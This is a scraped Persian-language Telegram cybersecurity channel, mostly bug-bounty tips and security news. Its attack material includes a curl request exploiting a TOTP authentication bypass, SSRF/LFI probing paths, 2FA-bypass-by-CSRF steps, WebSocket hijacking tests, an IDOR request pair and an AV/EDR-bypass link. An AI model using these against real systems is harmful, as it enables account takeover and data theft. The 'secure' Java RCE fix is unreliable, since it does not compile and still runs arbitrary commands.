CVE-2025-66489 - Authentication Bypass via TOTP Code Presence
curl -X POST https://localhost:3001/api/auth/callback/credentials
-H "Content-Type: application/x-www-form-urlencoded" \
-b cookies.txt \
-c cookies.txt \
-d "csrfToken=<TOKEN>&[email protected]&password=WRONG&totpCode=123456"
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤5
sanitizer ها
ممکن است به <https://> اجازه دهند فکر کند که این یک لینک خودکار Markdown است. اما اگر به جای یک تگ anchor به صورت HTML خام رندر شود، به یک بردار XSS تبدیل میشود.
در این PoC، مرورگر یک تگ https: سفارشی ایجاد میکند و اجزای URL را به عنوان ویژگیهای HTML تجزیه میکند.
https://storage.googleapis.com/nowaskyjr/xss-url-like-poc1.html
ممکن است به <https://> اجازه دهند فکر کند که این یک لینک خودکار Markdown است. اما اگر به جای یک تگ anchor به صورت HTML خام رندر شود، به یک بردار XSS تبدیل میشود.
در این PoC، مرورگر یک تگ https: سفارشی ایجاد میکند و اجزای URL را به عنوان ویژگیهای HTML تجزیه میکند.
https://storage.googleapis.com/nowaskyjr/xss-url-like-poc1.html
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤3🏆2👍1
اگر در حال بررسی سرور IIS ویندوز هستید
یک فایل پیشفرض وجود دارد که میتوانید از آن برای بررسی SSRF یا LFI استفاده کنید:
C:\inetpub\wwwroot\iisstart.png
example : foo?url=file:///C:/inetpub/wwwroot/iisstart.png.
یک فایل پیشفرض وجود دارد که میتوانید از آن برای بررسی SSRF یا LFI استفاده کنید:
C:\inetpub\wwwroot\iisstart.png
example : foo?url=file:///C:/inetpub/wwwroot/iisstart.png.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
👍4🏆1
the-art-of-pivoting.pdf
16.6 MB
The Art of Pivoting
تکنیک هایی برای تحلیلگران اطلاعات جهت کشف روابط جدید در جهانی پیچیده.
#pivoting #opensource #cti #threatintelligence #misp
تکنیک هایی برای تحلیلگران اطلاعات جهت کشف روابط جدید در جهانی پیچیده.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#pivoting #opensource #cti #threatintelligence #misp
❤4🏆2
Zero Trust Security Key Concepts
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
🏆2❤1🍌1
🚨 هشدار فوری
یک آسیبپذیری اجرای کد از راه دور (RCE) با شدت بحرانی (CVSS: 9.9) در پلتفرم اتوماسیون n8n شناسایی شده است.
این نقص امنیتی با شناسه CVE-2025-68613 ثبت شده و به کاربران احرازشده اجازه میدهد کد دلخواه اجرا کنند؛
موضوعی که میتواند به تصاحب کامل سرویس، دسترسی به دادهها و اجرای دستورات سیستمی منجر شود.
بر اساس گزارشها، بیش از 103 هزار نمونه در معرض اینترنت در سطح جهان شناسایی شدهاند که ریسک سوءاستفاده را بهشدت بالا میبرد.
در صورت استفاده از n8n، بررسی و اعمال اصلاحات امنیتی در اولویت فوری قرار دارد.
جزئیات بیشتر:
https://thehackernews.com/2025/12/critical-n8n-flaw-cvss-99-enables.html
#N8N #CVE_2025_68613 #RCE #SecurityAlert
یک آسیبپذیری اجرای کد از راه دور (RCE) با شدت بحرانی (CVSS: 9.9) در پلتفرم اتوماسیون n8n شناسایی شده است.
این نقص امنیتی با شناسه CVE-2025-68613 ثبت شده و به کاربران احرازشده اجازه میدهد کد دلخواه اجرا کنند؛
موضوعی که میتواند به تصاحب کامل سرویس، دسترسی به دادهها و اجرای دستورات سیستمی منجر شود.
بر اساس گزارشها، بیش از 103 هزار نمونه در معرض اینترنت در سطح جهان شناسایی شدهاند که ریسک سوءاستفاده را بهشدت بالا میبرد.
در صورت استفاده از n8n، بررسی و اعمال اصلاحات امنیتی در اولویت فوری قرار دارد.
جزئیات بیشتر:
https://thehackernews.com/2025/12/critical-n8n-flaw-cvss-99-enables.html
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#N8N #CVE_2025_68613 #RCE #SecurityAlert
2👍7🍌1
This media is not supported in the widget
VIEW IN TELEGRAM
❤5🍌2🏆1
اگه با Cloud Storageها کار میکنی، احتمالاً به rclone نیاز داری.
ابزاری برای بکاپ، سینک و مایگریشن که بهصورت rsync-like بین کلود استوریجها کار میکنه.
ریپو گیت هاب: https://github.com/rclone/rclone
ابزاری برای بکاپ، سینک و مایگریشن که بهصورت rsync-like بین کلود استوریجها کار میکنه.
ریپو گیت هاب: https://github.com/rclone/rclone
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤3🍌3
2FA Bypass via CSRF:🍸
1. Create two Account [email protected] & [email protected]
2. Login as Attacker and capture the 2FA disable request.
3.Create or Generate a CSRF PoC & save as .html
4.Now login with victim account and execute CSRF Poc.
5.2FA disabled successfully & attacker able to bypass the 2FA.
1. Create two Account [email protected] & [email protected]
2. Login as Attacker and capture the 2FA disable request.
3.Create or Generate a CSRF PoC & save as .html
4.Now login with victim account and execute CSRF Poc.
5.2FA disabled successfully & attacker able to bypass the 2FA.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤4🍌2🏆1
🚨 یک کمپین spearphishing هدفمند :
در طول پنج ماه، ۲۷ بسته مخرب npm منتشر کرده که بهعنوان زیرساخت میزبانی پایدار برای صفحات فیشینگ اجراشونده در مرورگر عمل میکنند. این بستهها صفحات دروغین شبیه پورتالهای بهاشتراکگذاری سند و صفحه ورود مایکروسافت را نمایش میدهند و برای سرقت اطلاعات ورود کارکنان سازمانهای صنعتی و بهداشتی در آمریکا و کشورهای همپیمان طراحی شدهاند
🔎source
در طول پنج ماه، ۲۷ بسته مخرب npm منتشر کرده که بهعنوان زیرساخت میزبانی پایدار برای صفحات فیشینگ اجراشونده در مرورگر عمل میکنند. این بستهها صفحات دروغین شبیه پورتالهای بهاشتراکگذاری سند و صفحه ورود مایکروسافت را نمایش میدهند و برای سرقت اطلاعات ورود کارکنان سازمانهای صنعتی و بهداشتی در آمریکا و کشورهای همپیمان طراحی شدهاند
🔎source
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
Socket
Spearphishing Campaign Abuses npm Registry to Target U.S. an...
A five-month operation turned 27 npm packages into durable hosting for browser-run lures that mimic document-sharing portals and Microsoft sign-in, ta...
2❤4🍌2🏆1
👾در اینجا مثالی از کد جاوا که در برابر حمله اجرای کد از راه دور (RCE) آسیبپذیر میباشد، آورده شده.👾
🥺 Vulnerable Code :
این برنامه از متد"Runtime.getRuntime().exec()" برای اجرای یک دستور سیستمی که به عنوان آرگومان به برنامه ارسال میشود، استفاده میکند. این دستور از طریق پارامتر "args[0]" که برای مهاجم قابل دسترسی است، به برنامه ارسال میشود.
😎 Secure Code :
در اینجا نسخهای از همان کد وجود دارد که در برابر حمله اجرای کد از راه دور (RCE) ایمن شده است :
در کد اصلی آسیب پذیر بود، به مهاجم اجازه میدهد تا کد دلخواهی را بر روی سرور اجرا کند. در کد امن، ورودی کاربر ابتدا با یک الگوی regex بررسی میشود تا مطمئن بشود این ورودی واقعا یه دستور مجازه، بعد اجراش کند
#secure_coding #bug_bounty #bugbounty
🥺 Vulnerable Code :
import java.io.*;
public class RCE {
public static void main(String[] args) throws Exception {
// Vulnerable code: user input is directly passed to the system command
Process p = Runtime.getRuntime().exec(args[0]); // args[0] can be manipulated by attacker
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = in.readLine()) != null) {
System.out.println(line);
}
}
}
این برنامه از متد"Runtime.getRuntime().exec()" برای اجرای یک دستور سیستمی که به عنوان آرگومان به برنامه ارسال میشود، استفاده میکند. این دستور از طریق پارامتر "args[0]" که برای مهاجم قابل دسترسی است، به برنامه ارسال میشود.
😎 Secure Code :
در اینجا نسخهای از همان کد وجود دارد که در برابر حمله اجرای کد از راه دور (RCE) ایمن شده است :
import java.io.*;
import java.util.regex.*;
public class RCE {
public static void main(String[] args) throws Exception {
// Secure code: user input is sanitized using regex to only allow approved commands
String pattern = "^[A-Za-z0-9_-]*$"; // regex for approved commands
Pattern p = Pattern.compile(pattern);
Matcher m = p.matcher(args[0]);
if (!m.matches()) {
System.out.println("Invalid command");
return;
}
Process p = Runtime.getRuntime().exec(args[0]);
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = in.readLine()) != null) {
System.out.println(line);
}
}
}
“Process p = Runtime.getRuntime().exec(args[0]);”
در کد اصلی آسیب پذیر بود، به مهاجم اجازه میدهد تا کد دلخواهی را بر روی سرور اجرا کند. در کد امن، ورودی کاربر ابتدا با یک الگوی regex بررسی میشود تا مطمئن بشود این ورودی واقعا یه دستور مجازه، بعد اجراش کند
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#secure_coding #bug_bounty #bugbounty
1❤3👍2
Forwarded from Hack Hive
بازم سلام👀
چند وقت وقت مفصل راجب وب سوکت بهتون گفتم اما هیچی راجب آسیب پذیری هاش نگفتیم صرفا نحوه کارش بود تا اینکه با یه وب سوکت خیلی نچسب رو به رو شدم 🫠
حالا بیاید با هم برسی کنیم بیشتر آسیب هایی که روی وب سوکت میخوره چیا هست؟ از کجا بفهمیم یه سامانه وب سوکت استفاده میکنه؟ چطوری باهاش برخورد کنیم؟
وب سوکت یا websocket برای ارتباط در لحظه اس مثلا مسینجر ها اما فقط توی ارتباط های درلحظه استفاده نمیشه!
میتونه حتی برای احراز هویت افراد یا انتقال دیتای اونا استفاده بشه👾
اما چطور بفهمیم سامانه داره از وب سوکت استفاده میکنه؟
وقتی داریم درخواست های از proxy خودمون رد میکنیم و یکی یکی ریکوئست هارو چک میکنیم یهو میبینی برای یه درخواست ساعت باید ۱۰ تا ریکوئست رد کنی! اون هیچی خب میگی یه وقتایی پیاده سازی ها به این شکل هستش اما میبینی توی هدر نوشته ws/ یا wss/ و اینجا جالب میشه:)
اینجا همون end point هست که ما میخوایم با وب سوکت ارتباط بگیریم و صداش کنیم تو این لحظه خودش چک لیست زیادی داره! مثلا حمله dos یا race condition خیلی رایجه تو وب سوکت و خیلی باحاله که ارسال درخواست بدون authentication توی وب سوکت خیلی مهمه چون اینجا با داده های حساسی سر و کار داری!
*اینو قبل از شروع برسی یکی از آسیب پذیری هاش بگم که کلی گشتم به نظرم بهتر از این مقاله برای توضیح آسیب های رایج وب سوکت پیدا نمیشه ... پست های دیگه اش هم حتما برسی کنید😉
آسیب پذیری مد نظر ما اسمش هست CSWSH! قبول دارم اسمش ترسناکه اما تستش خیلی راحته😅
وقتی درخواستی که ما میفرستیم پارامتر origin به درستی برسی نشه میتونیم مقدارش رو تغییر بدیم و بتونیم این درخواست رو از دامنه دیگه ای بزنیم اما خب چرا اصلا باید مهم باشه؟
بزار اسم کاملش رو بگم:
Cross-site websocket hijacking
فکر کنم راحت تر بفهمی دقیقا چرا مهمه! چون میتونه با ساختن یه فرم جعلی یا صفحه مشابه به ما کاربر رو فریب بده که درخواست بزنه با وب سوکت و ارتباط بگیره و تمام دیتایی که منتقل میشه برای ما قابل مشاهده باشه :)
پس ساده ترین کار ممکن وقتی یه وب سوکت دیدید اینه که با همون برپ خوشگلت تست کنی اتفاقا خیلی هم راحته!
کافیه بری بخش رپیتر بعد یه تب websocket باز کنید و یکی از درخواست های وب سوکت رو انتخاب کنیم حالا از هدر ها بخش origin رو خالی بزارید یا یه آدرس دیگه بهش بدید🤷🏻♀️
وقتی مسیج رو send کنید و جواب بگیرید و بتونیم ارتباط بگیرید ... بهتره سریع گزارشش کنی☺️
برای تمرین هم این لابراتور ها بد نیست که نگاهی بندازید حتی خودتون بالا بیارید و تست کنید🫧
@Hackhive_channel 🐝
چند وقت وقت مفصل راجب وب سوکت بهتون گفتم اما هیچی راجب آسیب پذیری هاش نگفتیم صرفا نحوه کارش بود تا اینکه با یه وب سوکت خیلی نچسب رو به رو شدم 🫠
حالا بیاید با هم برسی کنیم بیشتر آسیب هایی که روی وب سوکت میخوره چیا هست؟ از کجا بفهمیم یه سامانه وب سوکت استفاده میکنه؟ چطوری باهاش برخورد کنیم؟
وب سوکت یا websocket برای ارتباط در لحظه اس مثلا مسینجر ها اما فقط توی ارتباط های درلحظه استفاده نمیشه!
میتونه حتی برای احراز هویت افراد یا انتقال دیتای اونا استفاده بشه👾
اما چطور بفهمیم سامانه داره از وب سوکت استفاده میکنه؟
وقتی داریم درخواست های از proxy خودمون رد میکنیم و یکی یکی ریکوئست هارو چک میکنیم یهو میبینی برای یه درخواست ساعت باید ۱۰ تا ریکوئست رد کنی! اون هیچی خب میگی یه وقتایی پیاده سازی ها به این شکل هستش اما میبینی توی هدر نوشته ws/ یا wss/ و اینجا جالب میشه:)
اینجا همون end point هست که ما میخوایم با وب سوکت ارتباط بگیریم و صداش کنیم تو این لحظه خودش چک لیست زیادی داره! مثلا حمله dos یا race condition خیلی رایجه تو وب سوکت و خیلی باحاله که ارسال درخواست بدون authentication توی وب سوکت خیلی مهمه چون اینجا با داده های حساسی سر و کار داری!
*اینو قبل از شروع برسی یکی از آسیب پذیری هاش بگم که کلی گشتم به نظرم بهتر از این مقاله برای توضیح آسیب های رایج وب سوکت پیدا نمیشه ... پست های دیگه اش هم حتما برسی کنید😉
آسیب پذیری مد نظر ما اسمش هست CSWSH! قبول دارم اسمش ترسناکه اما تستش خیلی راحته😅
وقتی درخواستی که ما میفرستیم پارامتر origin به درستی برسی نشه میتونیم مقدارش رو تغییر بدیم و بتونیم این درخواست رو از دامنه دیگه ای بزنیم اما خب چرا اصلا باید مهم باشه؟
بزار اسم کاملش رو بگم:
Cross-site websocket hijacking
فکر کنم راحت تر بفهمی دقیقا چرا مهمه! چون میتونه با ساختن یه فرم جعلی یا صفحه مشابه به ما کاربر رو فریب بده که درخواست بزنه با وب سوکت و ارتباط بگیره و تمام دیتایی که منتقل میشه برای ما قابل مشاهده باشه :)
پس ساده ترین کار ممکن وقتی یه وب سوکت دیدید اینه که با همون برپ خوشگلت تست کنی اتفاقا خیلی هم راحته!
کافیه بری بخش رپیتر بعد یه تب websocket باز کنید و یکی از درخواست های وب سوکت رو انتخاب کنیم حالا از هدر ها بخش origin رو خالی بزارید یا یه آدرس دیگه بهش بدید🤷🏻♀️
وقتی مسیج رو send کنید و جواب بگیرید و بتونیم ارتباط بگیرید ... بهتره سریع گزارشش کنی☺️
برای تمرین هم این لابراتور ها بد نیست که نگاهی بندازید حتی خودتون بالا بیارید و تست کنید🫧
@Hackhive_channel 🐝
Ably Realtime
WebSocket security: How to prevent 9 common vulnerabilities
Discover common WebSocket vulnerabilities and learn how to secure your WebSocket connections with modern security practices, encryption, and vulnerability testing.
1❤2🍌2👍1
Session-Based Validation Bypass via Trusted Parameter Override
🔴GET /v1/user/profile/userDetails → Pulls my data based on my JWT session token.
🔴GET /v1/user/profile/userDetails?userId=victim-id
→ The app ignores the session and trusts the userId param which leads to exposing victim’s data
API
بهجای اینکه هویت کاربر رو فقط از روی JWT session بررسی کنه، به پارامتر userId داخل درخواست اعتماد میکنه.
یعنی مهاجم میتونه با قرار دادن userId یک قربانی، اطلاعات پروفایل اون رو بدون داشتن دسترسی مشاهده کنه.
ریشهی مشکل اینجاست که منطق بکاند پارامتر ارسالی رو نسبت به سشن احرازشده در اولویت قرار داده که باعث Broken Access Control و Session Confusion میشه.
#bugbountytips #websecurity
🔴GET /v1/user/profile/userDetails → Pulls my data based on my JWT session token.
🔴GET /v1/user/profile/userDetails?userId=victim-id
→ The app ignores the session and trusts the userId param which leads to exposing victim’s data
API
بهجای اینکه هویت کاربر رو فقط از روی JWT session بررسی کنه، به پارامتر userId داخل درخواست اعتماد میکنه.
یعنی مهاجم میتونه با قرار دادن userId یک قربانی، اطلاعات پروفایل اون رو بدون داشتن دسترسی مشاهده کنه.
ریشهی مشکل اینجاست که منطق بکاند پارامتر ارسالی رو نسبت به سشن احرازشده در اولویت قرار داده که باعث Broken Access Control و Session Confusion میشه.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#bugbountytips #websecurity
❤2🏆1
BypassAV
This map lists the essential techniques to bypass anti-virus and EDR
https://github.com/matro7sh/BypassAV
#cybersecurity #infosec #pentesting #redteam #bugbounty
This map lists the essential techniques to bypass anti-virus and EDR
https://github.com/matro7sh/BypassAV
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#cybersecurity #infosec #pentesting #redteam #bugbounty
❤3